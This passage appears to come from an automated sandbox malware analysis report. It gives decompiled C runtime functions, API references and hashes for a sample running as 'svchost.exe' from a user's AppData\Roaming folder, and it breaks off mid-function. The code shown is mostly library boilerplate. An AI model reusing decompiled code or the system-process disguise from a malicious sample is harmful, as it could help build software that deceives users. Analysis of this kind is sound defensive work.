                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: f54917e5badc8e402c7e79762da38ba16862e7cfa36e0556388975977180229c
                            • Instruction ID: 9cd92a5aa493d0de7405f9e2074837d15706ebb3fa4394a9fb466669ed0326e8
                            • Opcode Fuzzy Hash: f54917e5badc8e402c7e79762da38ba16862e7cfa36e0556388975977180229c
                            • Instruction Fuzzy Hash: 02F0963A189F1635993425196823F9A57C8CF42775F2500EFFD08765C1EF91D54350A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00BD01DD(void* __ecx, intOrPtr _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _t10;
                            				int _t12;
                            				int _t19;
                            				signed int _t21;
                            
                            				_t10 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t10 ^ _t21;
                            				_v12 = _v12 & 0x00000000;
                            				_t12 =  &_v12;
                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                            				if(_t12 != 0) {
                            					_t12 = GetProcAddress(_v12, "CorExitProcess");
                            					_t19 = _t12;
                            					if(_t19 != 0) {
                            						 *0xbe019c(_a4);
                            						_t12 =  *_t19();
                            					}
                            				}
                            				if(_v12 != 0) {
                            					_t12 = FreeLibrary(_v12);
                            				}
                            				E00BC786A();
                            				return _t12;
                            			}

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD018E,?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002), ref: 00BD01FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD0210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BD018E,?,?,00BD012E,?,00BEA6E0,0000000C,00BD0285,?,00000002,00000000), ref: 00BD0233
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 8c1ebf163b7cd53b6f8a80273712b32eca2a552e84878e3a897d2645b1608360
                            • Instruction ID: 820a52f5636244044fcadf69ce1a017f2512281517ba19693c9d4aadca00781f
                            • Opcode Fuzzy Hash: 8c1ebf163b7cd53b6f8a80273712b32eca2a552e84878e3a897d2645b1608360
                            • Instruction Fuzzy Hash: D4F04430A61258BBCB11AF91DC49B9DBFF4EF08711F400199F905AA260DFB05A80CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00BD05E4(signed int* __ecx, signed int __edx) {
                            				signed int _v8;
                            				intOrPtr* _v12;
                            				signed int _v16;
                            				signed int _t28;
                            				signed int _t29;
                            				intOrPtr _t33;
                            				signed int _t37;
                            				signed int _t38;
                            				signed int _t40;
                            				void* _t50;
                            				signed int _t56;
                            				intOrPtr* _t57;
                            				signed int _t68;
                            				signed int _t71;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t80;
                            				signed int* _t81;
                            				signed int _t85;
                            				void* _t86;
                            
                            				_t72 = __edx;
                            				_v12 = __ecx;
                            				_t28 =  *__ecx;
                            				_t81 =  *_t28;
                            				if(_t81 != 0) {
                            					_t29 =  *0xbec008; // 0xdc55bb75
                            					_t56 =  *_t81 ^ _t29;
                            					_t78 = _t81[1] ^ _t29;
                            					_t83 = _t81[2] ^ _t29;
                            					asm("ror edi, cl");
                            					asm("ror esi, cl");
                            					asm("ror ebx, cl");
                            					if(_t78 != _t83) {
                            						L14:
                            						 *_t78 = E00BCF6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                            						_t33 = E00BC9353(_t56);
                            						_t57 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                            						_t24 = _t78 + 4; // 0x4
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00BC9353(_t24);
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00BC9353(_t83);
                            						_t37 = 0;
                            						L15:
                            						return _t37;
                            					}
                            					_t38 = 0x200;
                            					_t85 = _t83 - _t56 >> 2;
                            					if(_t85 <= 0x200) {
                            						_t38 = _t85;
                            					}
                            					_t80 = _t38 + _t85;
                            					if(_t80 == 0) {
                            						_t80 = 0x20;
                            					}
                            					if(_t80 < _t85) {
                            						L9:
                            						_push(4);
                            						_t80 = _t85 + 4;
                            						_push(_t80);
                            						_v8 = E00BD850F(_t56);
                            						_t40 = E00BD09EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							goto L11;
                            						}
                            						_t37 = _t40 | 0xffffffff;
                            						goto L15;
                            					} else {
                            						_push(4);
                            						_push(_t80);
                            						_v8 = E00BD850F(_t56);
                            						E00BD09EB(0);
                            						_t68 = _v8;
                            						_t86 = _t86 + 0x10;
                            						if(_t68 != 0) {
                            							L11:
                            							_t56 = _t68;
                            							_v8 = _t68 + _t85 * 4;
                            							_t83 = _t68 + _t80 * 4;
                            							_t78 = _v8;
                            							_push(0x20);
                            							asm("ror eax, cl");
                            							_t71 = _t78;
                            							_v16 = 0 ^  *0xbec008;
                            							asm("sbb edx, edx");
                            							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                            							_v8 = _t74;
                            							if(_t74 == 0) {
                            								goto L14;
                            							}
                            							_t75 = _v16;
                            							_t50 = 0;
                            							do {
                            								_t50 = _t50 + 1;
                            								 *_t71 = _t75;
                            								_t71 = _t71 + 4;
                            							} while (_t50 != _v8);
                            							goto L14;
                            						}
                            						goto L9;
                            					}
                            				}
                            				return _t28 | 0xffffffff;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: af8858a155af908ec7cc4f7b0803f45f438e895668cc3e08dec60daedfb28abc
                            • Instruction ID: 3b37e7fa052cf101259359897e934c3a9a9904cfb7e7c397eaae53b152616a0e
                            • Opcode Fuzzy Hash: af8858a155af908ec7cc4f7b0803f45f438e895668cc3e08dec60daedfb28abc
                            • Instruction Fuzzy Hash: 9141B032A102049BDB14EF78C891B5EB7E5EF89714F1545AAE555EB382EB31ED01CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00BCE132(void* __ecx, short* _a4, short* _a8) {
                            				int _t7;
                            				char* _t13;
                            				signed int _t14;
                            				char* _t15;
                            				int _t19;
                            				intOrPtr* _t20;
                            				short* _t21;
                            				void* _t22;
                            				void* _t25;
                            				int _t29;
                            				int _t33;
                            				intOrPtr _t35;
                            				char* _t36;
                            
                            				_t25 = __ecx;
                            				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                            				_t21 = _a8;
                            				_t33 = _t7;
                            				_t35 = 0x2a;
                            				if(_t33 != 0) {
                            					if(_t21 != 0) {
                            						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
                            						if(_t19 == 0) {
                            							goto L1;
                            						} else {
                            							_t33 = _t33 + _t19;
                            						}
                            					}
                            				} else {
                            					L1:
                            					_t20 = E00BCC9CE();
                            					_t33 = 0;
                            					 *_t20 = _t35;
                            				}
                            				_t36 = E00BD0B10(_t25, _t33, 1);
                            				if(_t36 == 0) {
                            					L8:
                            					_t22 = 0;
                            				} else {
                            					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
                            					if(_t29 != 0) {
                            						if(_t21 == 0) {
                            							L12:
                            							_t13 = _t36;
                            							_t36 = 0;
                            							_push(0);
                            							_push(_t13);
                            							_t14 = E00BD6882(0);
                            							asm("sbb bl, bl");
                            							_t22 =  ~_t14 + 1;
                            						} else {
                            							_t15 = _t29 + _t36;
                            							 *((char*)(_t15 - 1)) = 0x3d;
                            							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
                            								goto L7;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            					} else {
                            						L7:
                            						 *((intOrPtr*)(E00BCC9CE())) = 0x2a;
                            						goto L8;
                            					}
                            				}
                            				E00BD09EB(_t36);
                            				return _t22;
                            			}

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE19C
                            • _free.LIBCMT ref: 00BCE1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,00BCDFF2,?,?), ref: 00BCE1DB
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: cd4836710a6fa9af2b6bfcc1527f2141067a08122fa716f7cfe2117363284a1d
                            • Instruction ID: 4c49759da5f5da4aa381f08d5e78da5d8a2ef8ae0a1e12fe4bc235b9831285b4
                            • Opcode Fuzzy Hash: cd4836710a6fa9af2b6bfcc1527f2141067a08122fa716f7cfe2117363284a1d
                            • Instruction Fuzzy Hash: 7D21D5B2259315BEBB212A765C49F772ADDDB82B70724026EFD24D72C1ED70CC008170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00BD7C60() {
                            				int _v8;
                            				void* __ecx;
                            				void* _t6;
                            				int _t7;
                            				char* _t13;
                            				int _t17;
                            				void* _t19;
                            				char* _t25;
                            				WCHAR* _t27;
                            
                            				_t27 = GetEnvironmentStringsW();
                            				if(_t27 == 0) {
                            					L7:
                            					_t13 = 0;
                            				} else {
                            					_t6 = E00BD7C29(_t27);
                            					_pop(_t19);
                            					_t17 = _t6 - _t27 >> 1;
                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                            					_v8 = _t7;
                            					if(_t7 == 0) {
                            						goto L7;
                            					} else {
                            						_t25 = E00BD0A25(_t19, _t7);
                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                            							_t13 = 0;
                            						} else {
                            							_t13 = _t25;
                            							_t25 = 0;
                            						}
                            						E00BD09EB(_t25);
                            					}
                            				}
                            				if(_t27 != 0) {
                            					FreeEnvironmentStringsW(_t27);
                            				}
                            				return _t13;
                            			}

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 00BD7C69
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD7C8C
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BD7CB2
                            • _free.LIBCMT ref: 00BD7CC5
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BD7CD4
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: d15b50bf9e6aff7608f5ac6fc6fe2946a6e2107f6fa6109a45f95b2b50c9d02c
                            • Instruction ID: 957a8f03a116e7d4310296ce6dd8d59fc630263666897634b22d6b8fa9f5fef6
                            • Opcode Fuzzy Hash: d15b50bf9e6aff7608f5ac6fc6fe2946a6e2107f6fa6109a45f95b2b50c9d02c
                            • Instruction Fuzzy Hash: BD0184766653557F27216A7A6DCCDBBEBADDFC2BA031801AAB904D7301FE608C0181B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E00BD44A9(void* __ecx) {
                            				intOrPtr _t2;
                            				void* _t4;
                            				void* _t10;
                            				void* _t11;
                            				void* _t13;
                            				void* _t15;
                            				long _t16;
                            
                            				_t11 = __ecx;
                            				_t16 = GetLastError();
                            				_t10 = 0;
                            				_t2 =  *0xbec238; // 0x6
                            				_t19 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t15 = E00BD0B10(_t11, 1, 0x364);
                            					_pop(_t13);
                            					if(_t15 != 0) {
                            						_t4 = E00BD3862(_t13, __eflags,  *0xbec238, _t15);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E00BD4297(_t13, _t15, 0xbf63f0);
                            							E00BD09EB(_t10);
                            							__eflags = _t15;
                            							if(_t15 != 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t15);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t10);
                            						L4:
                            						E00BD09EB();
                            						L8:
                            						SetLastError(_t16);
                            					}
                            				} else {
                            					_t15 = E00BD380C(_t11, _t19, _t2);
                            					if(_t15 != 0) {
                            						L9:
                            						SetLastError(_t16);
                            						_t10 = _t15;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t10;
                            			}

                            APIs
                            • GetLastError.KERNEL32(?,?,?,00BCC9D3,00BD0B62,?,00BD4453,00000001,00000364,?,00BCA8EB,?,?,00000000), ref: 00BD44AE
                            • _free.LIBCMT ref: 00BD44E3
                            • _free.LIBCMT ref: 00BD450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4520
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 0eabfc46e855bd456d3729033598baf1feb483183bfce03e994d4dd3836a2aff
                            • Instruction ID: abd7f0533babff514ef02fd50e6ee6b96489c185b833d958c324f9be0b8c9d8c
                            • Opcode Fuzzy Hash: 0eabfc46e855bd456d3729033598baf1feb483183bfce03e994d4dd3836a2aff
                            • Instruction Fuzzy Hash: 6501D13625074167822276796CDAB2FA6EADFD1765B2001A7F50497393FF708E824621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD7E7E(intOrPtr* _a4) {
                            				intOrPtr _t6;
                            				intOrPtr* _t21;
                            				void* _t23;
                            				void* _t24;
                            				void* _t25;
                            				void* _t26;
                            				void* _t27;
                            
                            				_t21 = _a4;
                            				if(_t21 != 0) {
                            					_t23 =  *_t21 -  *0xbec838; // 0xbec830
                            					if(_t23 != 0) {
                            						E00BD09EB(_t7);
                            					}
                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xbec83c; // 0xbf6555
                            					if(_t24 != 0) {
                            						E00BD09EB(_t8);
                            					}
                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xbec840; // 0xbf6555
                            					if(_t25 != 0) {
                            						E00BD09EB(_t9);
                            					}
                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xbec868; // 0xbec834
                            					if(_t26 != 0) {
                            						E00BD09EB(_t10);
                            					}
                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                            					_t27 = _t6 -  *0xbec86c; // 0xbf6558
                            					if(_t27 != 0) {
                            						return E00BD09EB(_t6);
                            					}
                            				}
                            				return _t6;
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BD7E96
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD7EA8
                            • _free.LIBCMT ref: 00BD7EBA
                            • _free.LIBCMT ref: 00BD7ECC
                            • _free.LIBCMT ref: 00BD7EDE
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: f13d000bd5ab036ac8e0363abe252b610c0f3433d13053b06ff328aa93cc9549
                            • Instruction ID: dad5c0b9786caa9effac79de62cd152654e23ae7823503d1215d703d1a74bfa1
                            • Opcode Fuzzy Hash: f13d000bd5ab036ac8e0363abe252b610c0f3433d13053b06ff328aa93cc9549
                            • Instruction Fuzzy Hash: 5DF0FF72559244AB9620FB5DE9C6D6BB7EDEA00B1076408C7F008DB711EF34FC818754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00BD0833(signed int __ecx) {
                            				intOrPtr _t7;
                            
                            				asm("lock xadd [eax], ecx");
                            				if((__ecx | 0xffffffff) == 0) {
                            					_t7 =  *0xbec828; // 0xe0b108
                            					if(_t7 != 0xbec608) {
                            						E00BD09EB(_t7);
                            						 *0xbec828 = 0xbec608;
                            					}
                            				}
                            				E00BD09EB( *0xbf630c);
                            				 *0xbf630c = 0;
                            				E00BD09EB( *0xbf6310);
                            				 *0xbf6310 = 0;
                            				E00BD09EB( *0xbf5e70);
                            				 *0xbf5e70 = 0;
                            				E00BD09EB( *0xbf5e74);
                            				 *0xbf5e74 = 0;
                            				return 1;
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BD0851
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD0863
                            • _free.LIBCMT ref: 00BD0876
                            • _free.LIBCMT ref: 00BD0887
                            • _free.LIBCMT ref: 00BD0898
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d09fc63c03d92f2a2c7433c7407b79612350034b31572b457899c35db3980d10
                            • Instruction ID: 2e666e5acecce318e4dc4701717218af3c80753ed9e8e797773471abef97baf6
                            • Opcode Fuzzy Hash: d09fc63c03d92f2a2c7433c7407b79612350034b31572b457899c35db3980d10
                            • Instruction Fuzzy Hash: 0DF030B1C116509B9A217F2DBC5652A7FE4E718B207000687F82097372EF760E42DFC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00BCF756(intOrPtr _a4) {
                            				signed int _v8;
                            				void* _v12;
                            				char _v16;
                            				intOrPtr* _t35;
                            				struct HINSTANCE__* _t36;
                            				struct HINSTANCE__* _t42;
                            				intOrPtr* _t43;
                            				intOrPtr* _t44;
                            				WCHAR* _t48;
                            				struct HINSTANCE__* _t49;
                            				struct HINSTANCE__* _t53;
                            				intOrPtr* _t56;
                            				struct HINSTANCE__* _t61;
                            				intOrPtr _t62;
                            
                            				if(_a4 == 2 || _a4 == 1) {
                            					GetModuleFileNameW(0, 0xbf5eb0, 0x104);
                            					_t48 =  *0xbf5e7c; // 0xe026c2
                            					 *0xbf5e80 = 0xbf5eb0;
                            					if(_t48 == 0 ||  *_t48 == 0) {
                            						_t48 = 0xbf5eb0;
                            					}
                            					_v8 = 0;
                            					_v16 = 0;
                            					E00BCF875(_t48, 0, 0,  &_v8,  &_v16);
                            					_t61 = E00BCF9FB(_v8, _v16, 2);
                            					if(_t61 != 0) {
                            						E00BCF875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                            						if(_a4 != 1) {
                            							_v12 = 0;
                            							_push( &_v12);
                            							_t49 = E00BD7493(_t61);
                            							if(_t49 == 0) {
                            								_t56 = _v12;
                            								_t53 = 0;
                            								_t35 = _t56;
                            								if( *_t56 == 0) {
                            									L15:
                            									_t36 = 0;
                            									 *0xbf5e6c = _t53;
                            									_v12 = 0;
                            									_t49 = 0;
                            									 *0xbf5e74 = _t56;
                            									L16:
                            									E00BD09EB(_t36);
                            									_v12 = 0;
                            									goto L17;
                            								} else {
                            									goto L14;
                            								}
                            								do {
                            									L14:
                            									_t35 = _t35 + 4;
                            									_t53 =  &(_t53->i);
                            								} while ( *_t35 != 0);
                            								goto L15;
                            							}
                            							_t36 = _v12;
                            							goto L16;
                            						}
                            						 *0xbf5e6c = _v8 - 1;
                            						_t42 = _t61;
                            						_t61 = 0;
                            						 *0xbf5e74 = _t42;
                            						goto L10;
                            					} else {
                            						_t43 = E00BCC9CE();
                            						_push(0xc);
                            						_pop(0);
                            						 *_t43 = 0;
                            						L10:
                            						_t49 = 0;
                            						L17:
                            						E00BD09EB(_t61);
                            						return _t49;
                            					}
                            				} else {
                            					_t44 = E00BCC9CE();
                            					_t62 = 0x16;
                            					 *_t44 = _t62;
                            					E00BD1788();
                            					return _t62;
                            				}
                            			}

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\svchost.exe,00000104), ref: 00BCF791
                            • _free.LIBCMT ref: 00BCF85C
                            • _free.LIBCMT ref: 00BCF866
                            Strings
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\AppData\Roaming\svchost.exe
                            • API String ID: 2506810119-3187766684
                            • Opcode ID: cc6f7b4f8625c8dfd1263c3824c3b98412006b1c56732b73d8484417d27d9953
                            • Instruction ID: 5b618a5cfd2edf668f4154b8c9eb57f4bdad610940a301cdf7983927895000a6
                            • Opcode Fuzzy Hash: cc6f7b4f8625c8dfd1263c3824c3b98412006b1c56732b73d8484417d27d9953
                            • Instruction Fuzzy Hash: 9A315E71A00619EFDB21DF99D885EAEBBFDEB85710B1040FBF90497251D6B08E41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E00BCF193(void* __ecx, char* _a4, char** _a8) {
                            				char* _v8;
                            				intOrPtr _v12;
                            				signed short* _v36;
                            				void* _t14;
                            				void* _t15;
                            				char** _t16;
                            				char* _t20;
                            				void* _t27;
                            				signed int* _t28;
                            				signed int* _t32;
                            				void* _t39;
                            				void* _t52;
                            				signed int _t57;
                            				signed short* _t58;
                            				intOrPtr _t59;
                            				char* _t61;
                            				char* _t62;
                            				signed int _t64;
                            				signed int* _t66;
                            				char* _t68;
                            				signed short* _t70;
                            
                            				_t39 = __ecx;
                            				_push(__ecx);
                            				_v8 = 0;
                            				_t14 = E00BD6CA2( &_v8, 0, L"TMP");
                            				if(_t14 == 0) {
                            					_t68 = _v8;
                            					_t61 = _t68;
                            					if(_t68 == 0) {
                            						goto L10;
                            					} else {
                            						_t20 = E00BD6D40(_t68, 0);
                            						if(_t20 != 0) {
                            							_push(_t61);
                            							L19();
                            							_t61 = _t20;
                            							if(_t61 == 0 || E00BD6D40(_t61, 0) != 0) {
                            								E00BD09EB(_t61);
                            								goto L10;
                            							} else {
                            								 *_a8 = _t61;
                            								E00BD09EB(0);
                            							}
                            						} else {
                            							_t68 = 0;
                            							 *_a8 = _t61;
                            						}
                            					}
                            					goto L17;
                            				} else {
                            					if(_t14 == 0x16) {
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E00BD1798();
                            						asm("int3");
                            						_push(_t39);
                            						_push(0);
                            						_push(_t67);
                            						_t70 = _v36;
                            						_push(_t60);
                            						_t52 = 0;
                            						_t27 = 0;
                            						_t58 = _t70;
                            						_t64 =  *_t70 & 0x0000ffff;
                            						if(_t64 == 0) {
                            							L34:
                            							_t28 = 0;
                            						} else {
                            							_v12 = 0x22;
                            							do {
                            								if(_t64 == _v12) {
                            									_t52 = _t52 + 1;
                            								}
                            								_t58 =  &(_t58[1]);
                            								_t27 = _t27 + 1;
                            								_t64 =  *_t58 & 0x0000ffff;
                            							} while (_t64 != 0);
                            							if(_t52 == 0) {
                            								goto L34;
                            							} else {
                            								_t66 = E00BD0B10(_t52, _t27 - _t52 + 1, 2);
                            								if(_t66 != 0) {
                            									_t32 = _t66;
                            									if( *_t70 != 0) {
                            										_t59 = _v12;
                            										do {
                            											_t57 =  *_t70 & 0x0000ffff;
                            											if(_t57 != _t59) {
                            												 *_t32 = _t57;
                            												_t32 =  &(_t32[0]);
                            											}
                            											_t70 =  &(_t70[1]);
                            										} while ( *_t70 != 0);
                            									}
                            									 *_t32 = 0;
                            								} else {
                            									_t66 = 0;
                            								}
                            								E00BD09EB(0);
                            								_t28 = _t66;
                            							}
                            						}
                            						return _t28;
                            					} else {
                            						_t68 = 0;
                            						L10:
                            						_t62 = _a4;
                            						if(_t62 == 0 || E00BD6D40(_t62, 0) != 0) {
                            							_t62 = "\\";
                            							_t15 = E00BD6D40(_t62, 0);
                            							_t16 = _a8;
                            							if(_t15 == 0) {
                            								goto L13;
                            							} else {
                            								 *_t16 = ".";
                            							}
                            						} else {
                            							_t16 = _a8;
                            							L13:
                            							 *_t16 = _t62;
                            						}
                            						_t61 = 0;
                            						L17:
                            						E00BD09EB(_t68);
                            						return _t61;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: 3eaaaec9277b387ebe40aeda2ff767709e8f88d4c820fd741a947e4a39d9e4f2
                            • Instruction ID: 60127fe0d9e579ea98d5b1c8da1d5b6378cd6e427d0f914e82c22c793b8385c0
                            • Opcode Fuzzy Hash: 3eaaaec9277b387ebe40aeda2ff767709e8f88d4c820fd741a947e4a39d9e4f2
                            • Instruction Fuzzy Hash: 2221F37B604507AF57256E5AA881F7FA3EEEA8577472500FEF804EF341EA30DC015260
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E00BC27A0(void* __edx, signed int _a8192, char* _a8200) {
                            				short _v0;
                            				signed int _t9;
                            				long _t12;
                            				signed int _t14;
                            				void* _t26;
                            				char* _t28;
                            				signed int _t32;
                            				signed int _t33;
                            
                            				_t26 = __edx;
                            				E00BC7880();
                            				_t9 =  *0xbec008; // 0xdc55bb75
                            				_a8192 = _t9 ^ _t32;
                            				_t28 = _a8200;
                            				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
                            				_t39 = _t12;
                            				if(_t12 != 0) {
